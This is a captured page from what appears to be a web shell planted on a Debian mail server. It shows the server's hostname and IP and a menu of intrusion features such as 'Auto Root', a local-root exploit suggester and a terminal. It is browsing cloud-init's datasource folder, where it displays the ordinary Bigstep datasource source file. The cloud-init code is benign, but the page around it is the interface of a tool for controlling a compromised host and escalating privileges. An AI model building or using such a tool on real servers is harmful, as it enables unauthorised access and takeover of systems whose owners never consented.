Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
cloudinit /
sources /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-07-12 06:55
helpers
[ DIR ]
drwxr-xr-x
2026-07-12 06:55
DataSourceAliYun.py
2.01
KB
-rw-r--r--
2022-11-23 21:17
DataSourceAltCloud.py
8.29
KB
-rw-r--r--
2022-11-23 21:17
DataSourceAzure.py
78.55
KB
-rw-r--r--
2022-11-23 21:17
DataSourceBigstep.py
1.92
KB
-rw-r--r--
2022-11-23 21:17
DataSourceCloudSigma.py
4
KB
-rw-r--r--
2022-11-23 21:17
DataSourceCloudStack.py
9.85
KB
-rw-r--r--
2022-11-23 21:17
DataSourceConfigDrive.py
11.01
KB
-rw-r--r--
2022-11-23 21:17
DataSourceDigitalOcean.py
3.81
KB
-rw-r--r--
2022-11-23 21:17
DataSourceEc2.py
34.83
KB
-rw-r--r--
2022-11-23 21:17
DataSourceExoscale.py
8.89
KB
-rw-r--r--
2022-11-23 21:17
DataSourceGCE.py
11.96
KB
-rw-r--r--
2022-11-23 21:17
DataSourceHetzner.py
5.41
KB
-rw-r--r--
2022-11-23 21:17
DataSourceIBMCloud.py
14.05
KB
-rw-r--r--
2022-11-23 21:17
DataSourceLXD.py
16.32
KB
-rw-r--r--
2022-11-23 21:17
DataSourceMAAS.py
14.39
KB
-rw-r--r--
2022-11-23 21:17
DataSourceNWCS.py
4.66
KB
-rw-r--r--
2022-11-23 21:17
DataSourceNoCloud.py
12.2
KB
-rw-r--r--
2022-11-23 21:17
DataSourceNone.py
1.36
KB
-rw-r--r--
2022-11-23 21:17
DataSourceOVF.py
31.02
KB
-rw-r--r--
2022-11-23 21:17
DataSourceOpenNebula.py
15.98
KB
-rw-r--r--
2022-11-23 21:17
DataSourceOpenStack.py
10.46
KB
-rw-r--r--
2022-11-23 21:17
DataSourceOracle.py
14.72
KB
-rw-r--r--
2022-11-23 21:17
DataSourceRbxCloud.py
7.83
KB
-rw-r--r--
2022-11-23 21:17
DataSourceScaleway.py
9.47
KB
-rw-r--r--
2022-11-23 21:17
DataSourceSmartOS.py
34.09
KB
-rw-r--r--
2022-11-23 21:17
DataSourceUpCloud.py
5.55
KB
-rw-r--r--
2022-11-23 21:17
DataSourceVMware.py
28.2
KB
-rw-r--r--
2022-11-23 21:17
DataSourceVultr.py
4.63
KB
-rw-r--r--
2022-11-23 21:17
__init__.py
38.92
KB
-rw-r--r--
2022-11-23 21:17
Save
Rename
# Copyright (C) 2015-2016 Bigstep Cloud Ltd. # # Author: Alexandru Sirbu <alexandru.sirbu@bigstep.com> # # This file is part of cloud-init. See LICENSE file for license information. import errno import json import os from cloudinit import sources, url_helper, util class DataSourceBigstep(sources.DataSource): dsname = "Bigstep" def __init__(self, sys_cfg, distro, paths): super().__init__(sys_cfg, distro, paths) self.metadata = {} self.vendordata_raw = "" self.userdata_raw = "" def _get_data(self, apply_filter=False) -> bool: url = self._get_url_from_file() if url is None: return False response = url_helper.readurl(url) decoded = json.loads(response.contents.decode()) self.metadata = decoded["metadata"] self.vendordata_raw = decoded["vendordata_raw"] self.userdata_raw = decoded["userdata_raw"] return True def _get_subplatform(self) -> str: """Return the subplatform metadata source details.""" return f"metadata ({self._get_url_from_file()})" def _get_url_from_file(self): url_file = os.path.join( self.paths.cloud_dir, "data", "seed", "bigstep", "url" ) try: content = util.load_file(url_file) except IOError as e: # If the file doesn't exist, then the server probably isn't a # Bigstep instance; otherwise, another problem exists which needs # investigation if e.errno == errno.ENOENT: return None else: raise return content # Used to match classes to dependencies datasources = [ (DataSourceBigstep, (sources.DEP_FILESYSTEM, sources.DEP_NETWORK)), ] # Return a list of data sources that match this set of dependencies def get_datasource_list(depends): return sources.list_from_depends(depends, datasources) # vi: ts=4 expandtab